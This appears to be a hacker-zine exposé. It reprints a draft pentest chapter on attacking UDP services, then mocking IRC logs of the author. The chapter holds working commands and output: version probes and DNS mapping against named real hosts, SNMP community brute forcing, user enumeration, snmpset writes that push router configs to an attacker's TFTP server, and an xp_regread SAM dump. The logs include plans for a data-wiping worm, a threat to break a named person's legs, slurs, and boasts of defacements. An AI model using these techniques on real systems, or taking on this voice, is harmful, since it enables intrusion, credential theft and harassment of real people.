hp-fun.c by sil
515 LPD
----[ 2.1 Chapter 6, Assessing UDP Network Services
Assessing UDP Network Services
This chapter focuses on the steps taken to properly test accessible UDP
network services during a network security assessment exercise. UDP
services are often accessible on poorly configured or protected hosts; with
vulnerable services that can be abused to glean network information, or to
compromise network devices directly through process manipulation and buffer
overflow attacks.
In particular, the assessment five key UDP services is covered in this
chapter:
DNS, listening on port 53
SNMP, listening on port 161
TFTP, listening on port 69
DHCP, listening on ports 67 and 68
Rwhod, listening on port 513
DNS
The DNS service uses two ports to fulfill requests; UDP port 53 to serve
standard direct requests (to resolve names to IP addresses and vice versa),
and TCP port 53 to serve DNS zone information during a DNS zone transfer.
This following section relates entirely to the assessment and probing of
DNS over UDP.
Retrieving DNS Version Information
DNS server version information can be gleaned directly across UDP port 53
by issuing a version.bind chaos txt request through the Unix dig utility as
shown in figure xx. In our example against mail.hmgcc.gov.uk, we find that
BIND 9.2.1 is running.
Figure xx: Using dig to retrieve BIND version information
# dig @mail.hmgcc.gov.uk version.bind chaos txt
; <<>> DiG 9.2.0 <<>> @mail.hmgcc.gov.uk version.bind chaos
txt
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21612
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0,
ADDITIONAL: 0
;; QUESTION SECTION:
;version.bind. CH TXT
;; ANSWER SECTION:
version.bind. 0 CH TXT "9.2.1"
;; Query time: 29 msec
;; SERVER: 195.217.192.1#53(mail.hmgcc.gov.uk)
;; MSG SIZE rcvd: 48
If you do not have access to the dig utility, nslookup can be used in an
interactive fashion from Windows, Unix or MacOS to perform the same
version.bind request, as shown in figure xx. In this second example we find
that relay2.ucia.gov is running BIND 4.9.11, one of the latest versions of
the BIND 4 DNS server software.
Figure xx: Using nslookup to retrieve BIND version information
# nslookup
> server relay2.ucia.gov
Default server: relay2.ucia.gov
Address: 198.81.129.194#53
> set class=chaos
> set type=txt
> version.bind
Server: relay2.ucia.gov
Address: 198.81.129.194#53
VERSION.BIND text = "4.9.11-REL"
BIND Vulnerabilities
The Berkeley Internet Name Daemon is run on most Unix name servers. BIND
has been found to be vulnerable to a plethora of buffer overflow and denial
of service attacks over recent years, and the Internet Software Consortium
has created a very useful HTML page to track all publicly known
vulnerabilities in BIND, accessible at www.isc.org/products/BIND/bind-
security.html. At the bottom of the ISC page is an excellent matrix
documenting exactly which versions of BIND are vulnerable to each known
attack. What follows is a summary of remotely exploitable vulnerabilities
within BIND to date, with details of the affected versions of software.
Remote Execution of Code Vulnerabilities in BIND
SIG overflow, affecting BIND 4.9.5 - 4.9.10, 8.1, 8.2 - 8.2.6 and 8.3.0 -
8.3.3
NXDOMAIN overflow, affecting BIND 8.2 - 8.2.6 and 8.3.0 - 8.3.3
libresolv overflow, affecting BIND 4.9.2 - 4.9.10
OpenSSL overflow, affecting BIND 9.1.0 and 9.2.x if built with SSL support
libbind overflow, affecting all versions of the stub resolver library from
BIND 4 prior to 4.9.9, BIND 8 prior to 8.2.6 and 8.3.0 - 8.3.2, and BIND
9.2.0 (also 9.2.1 if compiled with -enable-libbind)
TSIG overflow, affecting BIND 8.2, 8.2.1, 8.2.2 patch levels 1 - 7 and all
8.2.3 beta releases
NslookupComplain() bug, affecting BIND 4.9.3, 4.9.4, 4.9.5, 4.9.5 patch
level 1, 4.9.6 and 4.9.7
NXT record overflow bug, affecting BIND 8.2, 8.2 patch level 1 and 8.2.1
Remote Denial of Service (DoS) Vulnerabilities in BIND
Internal consistency check vulnerability, affecting all BIND 9 versions
prior to 9.2.1
ZXFR vulnerability, affecting BIND 8.2.2 and patch levels 1 - 6
sigdiv0 vulnerability, affecting BIND 8.2, 8.2.1 and 8.2.2 patch levels 1 -
5
SRV record bug, affecting BIND 8.2, 8.2.1 and 8.2.2 patch levels 1 - 6
SO_LINGER timeout bug, affecting BIND 8.1, 8.1.1, 8.1.2, 8.2 and 8.2.1
FDMAX vulnerability, affecting BIND 8.1, 8.1.1, 8.1.2, 8.2 and 8.2 patch
level 1
SIG record bug, affecting BIND 4.9.5, 4.9.5 patch level 1, 4.9.6, 8.1,
8.1.1, 8.2, 8.2 patch level 1 and 8.2.1
MAXDNAME bug, affecting BIND 4.9.5, 4.9.5 patch level 1, 4.9.6, 4.9.7,
4.9.8, 8.1, 8.1.1, 8.1.2, 8.2, 8.2 patch level 1, 8.2.1, 8.2.2 and 8.2.2
patch level 1
Exploit scripts for some of these vulnerabilities are publicly available
from archive sites such as Packet Storm (www.packetstormsecurity.org).
Various public tools to assess and exploit remote code execution bugs have
been harvested and can be found at www.trustmatta.com/tools/bind/.
Microsoft DNS Service Vulnerabilities
Windows 2000 in particular ships with built-in DNS services running. As the
Windows platform moves towards a native Active Directory model, historic
naming services such as WINS are being superceded by DNS.
At the time of writing, there is no easy way of listing current Windows
2000 Server DNS vulnerabilities. Due to the way that DNS is built into the
core operating system, you must currently trawl through an abundance of
vulnerabilities on the Microsoft Technet Security site
(www.microsoft.com/technet/security) before coming across specific DNS
server issues. A Google web search however, will often spread light over
recent problems.
DNS Information Leaks
Until recently, Checkpoint Firewall-1 shipped with a DNS allow any to any
rule within its default policy. Many other firewalls also suffer from this
oversight, and so it is often possible to access DNS services running on
internal systems that really shouldn't be providing name service to the
Internet.
During a penetration test I undertook in 1998 against a multinational
corporation, I was able to find that many internal network devices used a
large class-a IP space (using IP addresses gleaned through other
information leak vulnerabilities in SMTP and HTTP servers in particular).
After initial port scanning, I found a handful of accessible DNS servers,
which in turn seemed to be connected to the internal network. I was able to
enumerate internal hosts and networks through one name server in
particular, allowing me to build a detailed map of the internal network
space.
It is sometimes possible to connect directly to DNS servers on peripheral
network boundaries (using UDP port 53), and issue requests relating to
internal IP addresses, host names and networks, as shown in figure xx
below.
Figure xx: Using nslookup to map internal IP addresses
# nslookup
> set querytype=any
> server 144.51.5.2
Default server: 144.51.5.2
Address: 144.51.5.2#53
> 192.168.1.23
;; connection timed out; no servers could be reached
> 192.168.1.24
;; connection timed out; no servers could be reached
> 192.168.1.25
Server: 144.51.5.2
Address: 144.51.5.2#53
23.1.168.192.in-addr.arpa name = exchange.internal-
net.local.
An automated reverse DNS sweep tool such as ghba can even be modified to
query a specific name server for internal network information, this can
also be achieved without modifying source code by setting your
/etc/resolv.conf file to point at the target name server instead of your
local DNS servers.
SNMP
The Simple Network Management Protocol service listens on UDP port 161.
SNMP is often found running on network infrastructure devices such as
managed switches, routers and other appliances. Increasingly, SNMP can be
found running on Unix-based and Windows servers for central network
management purposes.
SNMP authentication is very simple and is sent across networks in
plaintext. SNMP MIB (Management Information Base) data can be retrieved
from a device by specifying the correct read community string, and SNMP MIB
data can be written to a device using the correct write community string.
MIB databases contain ASCII listings of OID (Object Identifier) values,
such as routing table information, network statistics, details of network
interfaces, and other information. Accessing a router MIB is useful when
performing further network reconnaissance and mapping.
When a remote attacker is faced with an SNMP service, he has two options:
Brute force SNMP community strings to access and manipulate OID values
Send malformed data to a vulnerable SNMP service, causing a buffer overflow
resulting in either a service crash or arbitrary code being executed on the
host or device
Two useful tools that are used by attackers and security consultants alike
for brute forcing SNMP community strings and accessing MIB entries are
ADMsnmp and snmpwalk.
ADMsnmp
The ADMsnmp tool is available from the ADM group home page at
adm.freelsd.net/ADM/. The utility is an effective command-line community
string brute force utility, and will run under most Unix-like platforms,
including Linux and FreeBSD. Figure xx below shows the ADMsnmp tool in use
against a Cisco router at 192.168.0.1 to find that the community string
private has write access.
Figure xx: Using ADMsnmp to brute force valid community strings
# ADMsnmp 192.168.0.1
ADMsnmp vbeta 0.1 (c) The ADM crew
ftp://ADM.isp.at/ADM/
greets: !ADM, el8.org, ansia
>>>>>>>>>>> get req name=root id = 2 >>>>>>>>>>>
>>>>>>>>>>> get req name=public id = 5 >>>>>>>>>>>
>>>>>>>>>>> get req name=private id = 8 >>>>>>>>>>>
>>>>>>>>>>> get req name=write id = 11 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 9 name = private ret =0
<<<<<<<<<<
>>>>>>>>>>>> send setrequest id = 9 name = private >>>>>>>>
>>>>>>>>>>> get req name=admin id = 14 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 10 name = private ret =0
<<<<<<<<<<
>>>>>>>>>>> get req name=proxy id = 17 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0
<<<<<<<<<<
>>>>>>>>>>> get req name=ascend id = 20 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0
<<<<<<<<<<
>>>>>>>>>>> get req name=cisco id = 23 >>>>>>>>>>>
>>>>>>>>>>> get req name=router id = 26 >>>>>>>>>>>
>>>>>>>>>>> get req name=shiva id = 29 >>>>>>>>>>>
>>>>>>>>>>> get req name=all private id = 32 >>>>>>>>>>>
>>>>>>>>>>> get req name= private id = 35 >>>>>>>>>>>
>>>>>>>>>>> get req name=access id = 38 >>>>>>>>>>>
>>>>>>>>>>> get req name=snmp id = 41 >>>>>>>>>>>
<!ADM!> snmp check on pipex-gw.trustmatta.com
<!ADM!>
sys.sysName.0:pipex-gw.trustmatta.com
name = private write access
Snmpwalk
The snmpwalk utility is part of the Net-SNMP (previously UCD-SNMP) suite of
tools available from net-snmp.sourceforge.net. The Net-SNMP toolkit can be
built on both Unix and Windows platforms, and contains other useful
utilities including snmpset (used to modify and set specific OID values).
Snmpwalk is used with the correct community string to download the entire
MIB database from the target device (unless a specific OID value to walk is
provided by the user). Figure xx below shows the snmpwalk utility being
used to download the MIB database from a Cisco router. The MIB is actually
around seven pages in length, so only the first 8 OID values are presented
here as an example.
Figure xx: Using snmpwalk to access the MIB through SNMP
# snmpwalk -c public 192.168.0.1
system.sysDescr.0 = Cisco Internetwork Operating System
Software IOS (tm) C2600 Software (C2600-IS-M), Version
12.0(6), RELEASE SOFTWARE (fc1) Copyright (c) 1986-1999 by
cisco Systems, Inc. Compiled Wed 11-Aug-99 00:16 by phanguye
system.sysObjectID.0 = OID: enterprises.9.1.186
system.sysUpTime.0 = Timeticks: (86128) 0:14:21.28
system.sysContact.0 =
system.sysName.0 = pipex-gw.trustmatta.com
system.sysLocation.0 =
system.sysServices.0 = 78
system.sysORLastChange.0 = Timeticks: (0) 0:00:00.00
Default Community Strings
Most routers, switches and wireless access points from Cisco, 3Com,
Foundry, D-Link and other companies use public and private as their
respective default read and write SNMP community strings. The community
string list provided with the ADMsnmp brute force program includes cisco,
router, enable, admin, read, write and other obvious values. It is often
recommended that when assessing routers or devices belonging to a specific
organization, that you tailor your list accordingly (including the company
name and other values that may be used in that instance).
Compromising Devices Through Reading from SNMP
Many Windows NT and 2000 servers run SNMP services, using the community
string of public for read access. By walking through the
1.3.6.1.4.1.77.1.2.25 OID within a Windows NT or 2000 server, we can
enumerate user names of active accounts on the target host 192.168.0.251:
# snmpwalk -c public 192.168.102.251 .1.3.6.1.4.1.77.1.2.25
enterprises.77.1.2.25.1.1.8.119.105.114.101.108.101.115.115 =
"Chris"
enterprises.77.1.2.25.1.1.12.73.85.83.82.95.67.65.82.84.77.65.7
8 = "IUSR_CARTMAN"
enterprises.77.1.2.25.1.1.12.73.87.65.77.95.67.65.82.84.77.65.7
8 = "IWAM_CARTMAN"
enterprises.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114
.97.116.111.114 = "Administrator"
enterprises.77.1.2.25.1.1.14.84.115.73.110.116.101.114.110.101.
116.85.115.101.114 = "TsInternetUser"
enterprises.77.1.2.25.1.1.15.78.101.116.83.104.111.119.83.101.1
14.118.105.99.101.115 = "NetShowServices"
In the above example, the usernames Chris and Administrator are identified,
along with the built-in Windows IUSR_hostname, IWAM_hostname,
TsInternetUser and NetShowServices users.
Various wireless access points and other hardware appliances have been
known to contain passwords and details of writable community strings
within the accessible MIB. It is highly recommended that for each MIB
downloaded from a device over SNMP, each OID value should be checked
by hand to ensure that any sensitive information is gleaned.
Compromising Devices Through Writing to SNMP
If you have compromised the write community string of a Cisco IOS or Ascend
branded device, a useful attack to gain direct access is to first set up a
TFTP server on an accessible Internet host, and then modify key OID values
on the target device over SNMP using snmpset so that the device
configuration file (containing direct access passwords under Cisco IOS in
particular) can be uploaded to us through TFTP. Examples of this attack
against Cisco IOS and Ascend network devices are shown in figures xx and xx
below.
Figure xx: Writing Cisco IOS OID values to upload the devices
configuration file to a TFTP server listening at 192.168.0.50
# snmpset -r 3 -t 3 192.168.0.1 private
.1.3.6.1.4.1.9.2.1.55.192.168.0.50 s "cisco-config"
Figure xx: Writing Ascend OID values to upload the devices
configuration file to a TFTP server listening at 192.168.0.50
# snmpset -r 3 -t 3 192.168.0.254 private
.1.3.6.1.4.1.529.9.5.3.0 a "192.168.0.50"
# snmpset -r 3 -t 3 192.168.0.254 private
.1.3.6.1.4.1.529.9.5.4.0 s "ascend-config"
In order for this attack to work, we must install and configure an
accessible TFTP server for the appliance to upload its configuration file
to. This can either be achieved from a Unix-based platform by modifying the
/etc/inetd.conf file to run tftpd from inetd, or using a Windows TFTP
server, such as the Cisco TFTP Server, available from www.cisco.com/pcgi-
bin/tablebuild.pl/tftp. One key point to remember when performing this
exploit is to ensure your TFTP server is writeable so that the device can
upload its configuration file.
SNMP running on hardware appliances in particular can be imaginatively
abused by writing to a plethora of different OID values, from modification
of routing tables, to uploading new firmware and configuration files. It is
often best to test SNMP attacks in a lab environment before performing them
in live networks, as crashing routers, switches and other critical
infrastructure devices is often undesirable.
Compromising Devices Through Overflowing SNMP
In 2001, a series of SNMP overflows were released for most operating
platforms, including Windows and Unix-based systems.
TFTP
The Trivial File Transfer Protocol service listens on UDP port 69, and is
often found running on network infrastructure devices including managed
switches and routers. TFTP is most used by network administrators for the
purposes of configuration file and firmware upload and download when
installing and configuring devices.
Cisco 1600 series router proof of concept TFTP exploit
www.securiteam.com/exploits/5KP0O0A81K.html
DHCP
Dynamic Host Configuration Protocol (known as either BOOTP in Unix
environments, or DHCP in Windows environments) allows diskless workstations
to retrieve network and configuration details from the local network on
boot. The service itself listens on UDP port 67, with UDP port 68 being
used by clients for the receipt of network configuration details.
Rwhod
Udp 513
Who, rwho?
Port 137 netbios-ns
NetBIOS name service (UDP)
firewalls: Firewall administrators will frequently see large numbers of
incoming packets to port 137. This is due to the behavior of Windows
servers that use NetBIOS (as well as DNS) to resolve IP addresses to names
using the "gethostbyaddr()" function. As users behind the firewalls surf
Windows-based web sites, those servers will frequently respond with NetBIOS
lookups.
Port 138 netbios-dgm (UDP)
NetBIOS datagram (UDP)
Used by Windows (and services on UNIX like SAMBA). The main danger on the
Internet is that by crafting special messages sent to this port, a hacker
can convince Windows that their machine is "local", and can therefore
bypass some of Microsoft's security settings that differentiate between
"local" and "internet" zones.
--[3. Assorted IRC Logs - A Journey into My Psyche
This is for you guys that weren't in some of the channels I hang out in.
As you can see, I anounced my book quite some time ago ;)
[00:07:27] <so1o> i'm writing a book for o'reilly about pentesting
[00:07:31] <so1o> it'll be out in a couple of months
[00:07:36] <so1o> they paid me a fat advance
[00:07:38] <Haggis> nice
[00:07:44] <so1o> all i gotta do now is finish it
[00:07:53] <Haggis> lol.. yeah.. thats always the problem
[00:08:04] <so1o> yeah well i wrote 70,000 words already
[00:08:12] <so1o> i got another 10,000 or so to go
[00:08:22] <so1o> writing about msrpc security atm
[00:08:29] <so1o> enumerating users through the samr interface
[00:08:30] <so1o> alsortz
[00:08:36] <so1o> msrpc is bonkers
[00:08:41] <so1o> no-one should run that shit on the internet
[00:08:44] <Haggis> lol.. yup... sure is
[00:08:46] <so1o> its full of bugs
[00:08:58] <Haggis> i think they're called 'features'
[00:09:02] <so1o> ha
[00:09:13] <so1o> theres a fundemental flaw in netbios-dgm
[00:09:18] <so1o> that microsoft refuse to patch
[00:09:27] <so1o> because it would mean re-writing half their netbios code
[00:09:38] <Haggis> who the fuck wants netbios anyway?
[00:09:44] <so1o> companies
[00:09:48] <so1o> with big internal networks
[00:09:48] <so1o> :/
[00:09:57] <so1o> thats ok tho
[00:09:59] <Haggis> oh yeah... only half the world!
[00:10:01] <so1o> keeps people like me in a job
[19:58:53] <kraft> do you guys have an oreilly bookshelf
[19:59:58] <so1o> yo yo
[20:00:03] <so1o> <kraft> do you guys have an oreilly bookshelf
[20:00:05] <so1o> :/
[20:00:12] <so1o> im writing a book for oreilly
[20:00:17] <so1o> it gets published in november
[20:00:23] <kraft> which book ?
[20:00:29] <so1o> network security assessment
[20:00:43] <so1o> its about professional pen-testing
[20:00:48] <so1o> internet-based
[20:00:50] <B-r00t> got any samples? .
[20:01:03] <giles> yeah that would be cool to check out
[20:01:22] <so1o> b-r00t nah itz under technical review
[20:01:31] <so1o> i got to pick 3 of my 7 technical reviewers
[20:01:39] <so1o> so picked john mcdonald, ben laurie and david litchfield
[20:01:43] <so1o> its going to be a dark book
[20:02:07] <giles> who is the target of the book
[20:02:21] <so1o> like technical systems / network administrators
[20:02:24] <so1o> and it security teams
[20:02:53] <giles> will you give real world examples of the starting phase
to the end phase, dealing with correct ways to write contracts
[20:02:54] <giles> and such
[20:03:03] <so1o> bro
[20:03:07] <so1o> its a dark book
[20:03:11] <so1o> whats ur email addr
[20:03:16] <so1o> i'll mail u a pdf of chapter 4
[20:03:19] <so1o> the darkest chapter so far
[20:03:20] <so1o> ;]
[20:03:21] <B-r00t> yu got mine!
[20:03:30] <giles> i just msged you mine
[20:03:33] <so1o> wrd
[20:03:36] <so1o> i'll hit u up holmez
[20:03:36] <giles> thx man
[20:03:38] <so1o> drop me a line back
[20:03:43] <so1o> with some comments
[20:04:12] <B-r00t> if yu share yer shit on here ...most co0l ppl will give
yu honest critz...
[20:04:16] <kraft> have you seen that open soure pen test methodology
project ?
[20:04:22] <so1o> yeah its shit
[20:04:27] <so1o> peter herzog is a fucking punk
[20:04:32] <kraft> heh
[20:04:35] <so1o> my book is based on cesg check
[20:04:37] <so1o> and nsa iam
[20:04:45] <so1o> the proper testing methodologies
[20:04:58] <kraft> are you check team leader ?
[20:05:48] <so1o> nope
[20:06:02] <so1o> our company doesnt subscribe to check
[20:06:05] <so1o> 7k/year
[20:06:16] <so1o> yo kraft ru from the uk
[20:06:19] <so1o> what do u do
[20:06:40] <kraft> yup
[20:06:53] <kraft> pen test, consultant etc
[20:07:33] <B-r00t> im a builder .. heh
[20:07:56] <B-r00t> br00t@blueyonder.co.uk
[20:08:01] <marshal-l> I'm a mechanic
[20:09:27] <so1o> ok mail sent
[20:09:32] <so1o> chapter 4 is all about scanning
[20:09:39] <so1o> the later chapters drill down into services
[20:09:46] <so1o> web, ftp, sql, bla blah blaha
[20:10:29] <B-r00t> this sounds goos dude ...
[20:10:46] <B-r00t> if yu want to host it here ...ill give yu a slot!
[20:10:57] <B-r00t> s/goos/good/ ..soz
[20:11:19] <so1o> bro
[20:11:25] <so1o> its being published by oreilly
[20:11:26] <so1o> in november
[20:11:28] <so1o> u klutz
[20:11:29] <so1o> ;]
[20:11:38] <B-r00t> oh right yeah sorry ... the big time ..wo0two0t!
[20:11:42] <so1o> exactly
[20:11:44] <so1o> teh big time!
[20:11:53] <giles> you are going to have major bling
[20:12:01] <giles> get your teeth all iced
[20:12:10] <so1o> yeah well i got my advance last week
[20:12:15] <so1o> 5k
[20:12:18] <giles> not bad
[20:12:25] <giles> how long did it take to write
[20:12:26] <giles> ?
[20:12:30] <so1o> yeah considering most of the book is written
[20:12:34] <so1o> 3 years so far on and off
[20:12:39] <so1o> probably 6 months
[20:12:43] <so1o> of determined effort
[20:12:44] <so1o> ;]
[20:12:48] <giles> nice
[20:12:56] <so1o> hit me up with some feedback
[20:13:08] <so1o> and i might send over some other chapters
[20:13:13] <so1o> my web assessment chapter is dark
[10:38:34] <so1o> lemme paste the chapter list..
[10:38:57] <so1o> Chapter 1, Network Security Assessment, introduces and
discusses the rationale behind network security assessment and the fact that
assurance of security is a process and not simply a product.
[10:38:57] <so1o> Chapter 2, The Tools Required, covers the various
Unix-based operating platforms and tool kits that determined attackers and
network security professionals can be found using.
[10:38:57] <so1o> Chapter 3, Internet Host & Network Enumeration, logically
walks through the Internet-based options that a potential attacker has to
map your network from open web searches through to DNS sweeping and querying
of authoritative name servers.
[10:38:57] <so1o> Chapter 4, IP Network Scanning, discusses all known IP
network scanning techniques and their relevant application, also listing
tools and systems that support such scanning types. IDS evasion and
low-level packet analysis techniques are also covered.
[10:38:57] <so1o> Chapter 5, Assessing Remote Information Services, defines
the techniques and tools used to execute information leak attacks against
services such as LDAP, auth, finger and DNS. Some process manipulation
attacks are discussed here where appropriate.
[10:38:57] <so1o> Chapter 6, Assessing Web Services, comprehensively covers
the assessment of web services including IIS, Apache, OpenSSL and other
components such as Frontpage Extensions and Outlook Web Access. Risk
mitigation strategies are also detailed, including use of egress network
filtering and web service configuration.
[10:38:58] <kraft> k
[10:39:18] <so1o> then 7 - 12 are all about specific services, rpc, windows
services, etc.
[10:39:25] <so1o> 13 is about application security
[10:39:47] <so1o> 14 is about example assessment methodologies (against
win2k web server, linux mail server and cisco ios router)
[10:39:55] <so1o> and then its onto the appendices
Sometimes my friends and I play this game called, "Think Like a Hacker,"
where we try to imagine what we would do if we weren't some of England's
best paid and well established ethical hackers :)
[19:52:47] <so1o> there are plenty more bugs in rpc
[19:52:50] <so1o> someone should find one
[19:52:55] <so1o> and write a new worm
[19:53:00] <so1o> i.e. not publicize it
[19:53:03] <so1o> if i did that
[19:53:07] <so1o> i'd write the most darkside worm
[19:53:10] <so1o> that just spread
[19:53:16] <so1o> and after 48 hours rm'd the boxes
[22:20:29] <so1o> whats new in nmap
[22:20:33] <so1o> i need to update my book chapter
[22:24:55] <kraft_> did matta have a stand at infosec ?
[22:25:22] <so1o> nah we never do
[22:25:28] <so1o> its too expensive
See the comments on TESO below :)
[15:05:36] <so1o> i talk about telnetfp in my book
[15:05:44] <so1o> its the best thing for fingerprinting telnet services
[16:43:40] <so1o> i have a digital camcorder
[16:43:49] <so1o> i cAN MAKE MOVIES
[16:45:52] <so1o> !!!!!!!!!!!!!!!11
Hmm... maybe I can send the techtv editors a last-minute submission
for that hacking special they did on phobos/cold-fire/cjunkie.
[23:38:54] <so1o> ha
[23:39:01] <so1o> i have 7350buttseckz
[23:39:09] <so1o> teso are fucking retarded anyhow
[23:39:10] <so1o> f teso
NOTE: teso made the hacking part of this book possible.
[23:45:46] <so1o> f attrition
[23:45:51] <so1o> brian martin is a punk
[23:45:53] <so1o> if i ever meet him
[23:45:58] <so1o> im gonna remix him
[23:46:20] <so1o> he is a stupid cunt
[23:46:27] <so1o> honestly tho
[23:46:32] <so1o> i would have no regrets
[23:46:36] <so1o> in breaking his legs
[23:46:43] <so1o> i would do jail time for that
[23:47:02] <so1o> fucking punk
NOTE: Without the attrition.org mirrors of my defacements provided
in hyperlink format on my resume, I might still be unemployed today!
[23:50:46] <so1o> im writing a book for oreilly
[23:50:48] <so1o> about pentesting
[23:50:55] <embrey> oh yah ? nice.
[23:50:58] <embrey> good money in that ?
[23:50:59] <so1o> it'll be published in january..
[23:51:03] <so1o> yeah well 8k usd advance
[23:51:08] <so1o> and 10% royalties
[23:51:13] <embrey> first book ?
[23:51:17] <so1o> yep
[23:51:21] <embrey> congrats
[23:51:27] <so1o> yeah well it took me over 2 years
[23:51:36] <so1o> to get oreilly to agree to acquire me
[23:51:37] <embrey> it's a phone book huh ?
[23:51:38] <so1o> as an author
[23:51:45] <so1o> nop this is the thing
[23:51:54] <so1o> when its published it'll be 280-300 pages
[23:51:58] <so1o> hacking exposed is like 800 pages
[23:52:00] <so1o> of shit
[23:52:02] <embrey> yep they all are
[23:52:09] <embrey> all get pirated now to
[23:52:17] <so1o> john mcdonald, david litchfield, ben laurie
[23:52:20] <so1o> and a few other ppl
[23:52:23] <so1o> are doing my technical review
[23:52:26] <embrey> they contributed to it ?
[23:52:30] <so1o> i got to pick my own tech reviewers
[23:52:30] <so1o> ;]
[23:52:33] <embrey> nice
[23:52:49] <so1o> yeah so thats going to make it pretty lockdown
[23:52:52] <so1o> in terms of info
[23:53:39] <so1o> hacker cracker
[23:53:43] <embrey> yah yah
[23:53:43] <so1o> by that ejovi guy
[23:53:51] <so1o> joej__
[23:53:53] <so1o> or something
[23:53:56] <embrey> yah
[23:54:06] <so1o> yeah f him
[23:54:10] <so1o> all those american cunts
[00:05:40] <embrey> are you the so1o those phc guys hate ?
[00:06:47] <so1o> yeah
[00:06:49] <so1o> f phc
[00:06:51] <so1o> they are fake as fuck
[00:06:55] <embrey> i thought i reconized the nick
[00:06:58] <embrey> didn't know from where.
[00:06:58] <so1o> i used to be on phc
[00:07:03] <so1o> when gayh1tler ran it
[00:07:07] <so1o> then he left
[00:07:14] <embrey> that's the guy that runs the mailinglist no ?
[00:07:17] <so1o> and all these new ppl started jumping up
[00:07:21] <so1o> like jimjones
[00:07:22] <embrey> all these people and grps are confusing as shit
[00:07:24] <so1o> and halfdead
[00:07:29] <so1o> = fake phc
[00:07:31] <embrey> he's a ass
[00:07:35] <so1o> yeah 4rea
[00:07:36] <so1o> l
[00:07:37] <so1o> thatz about it
[00:07:44] <embrey> i've seen tons of logs with him. does nothing but insult
people
[00:07:50] <so1o> exactly
[00:07:55] <so1o> but yeah
[00:07:56] <so1o> itz me
[00:08:00] <so1o> the imfam0uz
[00:08:00] <embrey> talk about how he wrote dos virii in nineteen fucking
eight two or some shit
[00:08:29] <so1o> the funny thing is when i go into meetings
[00:08:34] <so1o> with sec ppl from banks or whatnot
[00:08:39] <so1o> 'werent u that so1o guy'
[00:08:42] <so1o> 'from back in the day'
[00:08:46] <so1o> hahaahaaaaaaaaaaa
[00:08:46] <so1o> cunts
[00:08:59] <embrey> it doesn't hold you back ? lose any jobs because of it ?
[00:09:15] <so1o> nah well this is the thing
[00:09:20] <so1o> we lost a 300k pentesting deal because of it
[00:09:33] <so1o> because of attrition.org in particular
[00:09:36] <so1o> but other than that
[00:09:39] <so1o> everythings cool
[00:09:43] <so1o> a lot of our clients think its neat
[00:09:49] <so1o> that i kno what im talking about
[00:09:54] <so1o> and we have a lot of big clients
[00:10:04] <embrey> there's that kind of money in that ?
[00:10:09] <so1o> merrill lynch, barclays, american express
[00:10:10] <so1o> yeah
[00:10:14] <so1o> big dollar in proper pentesting
[00:10:19] <so1o> like framework agreements
Thanks for looking past our disagreements in the past and letting me
publish this article in your wonderful magazine, PHC!
[00:12:14] <embrey> so attrition guys ratted you out for defacements ?
[00:12:23] <so1o> yeah basically
[00:12:30] <so1o> and linked me to antionline
[00:12:33] <so1o> all sorts of shit
[00:12:40] <embrey> they were real cozy with pigs eh ?
[00:12:49] <embrey> eww antionline ?
[00:13:21] <so1o> yeah
[00:13:33] <so1o> back in the day i was investigating using antionline for
marketing space
[00:13:34] <embrey> you hacked it right ?
[00:13:36] <so1o> like banners and whatnot
[00:13:39] <so1o> yeah well i hacked it too
[00:13:41] <so1o> in the end
[00:14:37] <so1o> when my book drops everything will get remixed
[00:15:36] <so1o> yeah embrey well i figured if i wrote a book, i wouldnt
have trouble getting a job ever again
[00:17:11] <embrey> mister so1o your old huh ?
[00:17:14] <so1o> 23
[00:17:20] <embrey> oh ok
[00:17:31] <so1o> left school at 17
[00:17:33] <so1o> fuck that shit
[00:17:34] <so1o> get a job
[00:17:41] <so1o> i worked at EDS for like 6 weeks
[00:17:41] <embrey> some www had you listed as 38 hehe
[00:17:44] <so1o> and got fired
[00:17:47] <so1o> for winnuking the fuck
[00:17:50] <embrey> peroit old company
[00:17:55] <so1o> out of the people i didnt like
[00:17:56] <so1o> :/
[00:18:10] <so1o> "DAMNIT MY MACHINE HAZ CRASHED AGAIN!"
[00:18:16] <so1o> "MUST BE A HARDWARE PROBLEM!"
[00:18:18] <so1o> haaaaaaaa
[00:18:20] <so1o> fucking cunts
[00:24:16] <embrey> so you work for barclays now ? i heard something about
their atms' this week
[00:24:23] <so1o> nah i dont work for barclays
[00:24:26] <so1o> i work for matta
[00:24:29] <so1o> matta is my company
[00:24:37] <embrey> and in turn they work for barclays...
[00:24:42] <so1o> there are only 5 of us
[00:24:44] <flame> hmm
[00:24:45] <so1o> yeah exactly
[00:28:56] <so1o> i like el8 magazine
[14:24:54] <so1o> has anyone seen phrack 62
[14:24:55] <so1o> the fake one
[14:25:00] <so1o> thats a lot like ~el8 magazine
[14:25:19] <Haggis> no.. haven't read it ... yer book or phrack that is...
can you /msg me the the link and i'll get it done this evening...
[14:25:35] <Haggis> you mentioned a SQL section ...
[14:25:47] <so1o> yeah
[14:25:49] <so1o> exactly
[14:26:23] <so1o> xp_regread
[14:26:23] <so1o> The xp_regread procedure allows us to dump registry keys
from the database server. In particular this is useful to glean encrypted
password strings for software such as VNC, or the Windows SAM database (if
SYSKEY encryption is not in use). To dump the SAM from the registry, we
would issue the following command:
[14:26:23] <so1o> EXEC xp_regread
HKLM,'SECURITY/SAM/Domains/Account','c:/temp/out.txt'
[14:26:25] <so1o> !!!!!!!!!!1111
[14:26:56] <Haggis> linsql can do that too.. well, the non-public version ;)
[14:27:04] <so1o> linsqqqqqqqlllllll
[14:27:09] <so1o> bro u gotta hook it up
[14:27:15] <so1o> so ican put it in my oreilly book
[14:27:19] <so1o> and mAKE U FAM0UZ
[14:27:44] <Haggis> no thanks ;) i remember that kind of fame!
[14:28:01] <so1o> ha
[14:28:05] <so1o> every1 wantz to be fam0uz
[14:28:06] <so1o> me me me
[14:28:09] <so1o> make me a star!
[15:10:12] <so1o> idefense are funny
[15:10:16] <so1o> i want to work for them someday
[15:10:32] <so1o> i think they'll go out of business tho
[15:10:34] <giles> so1o: no more reads ?
[15:10:35] <so1o> by the end of the day
[15:10:37] <so1o> year
[15:10:43] <so1o> giles not today bro i'm locking down this chapter
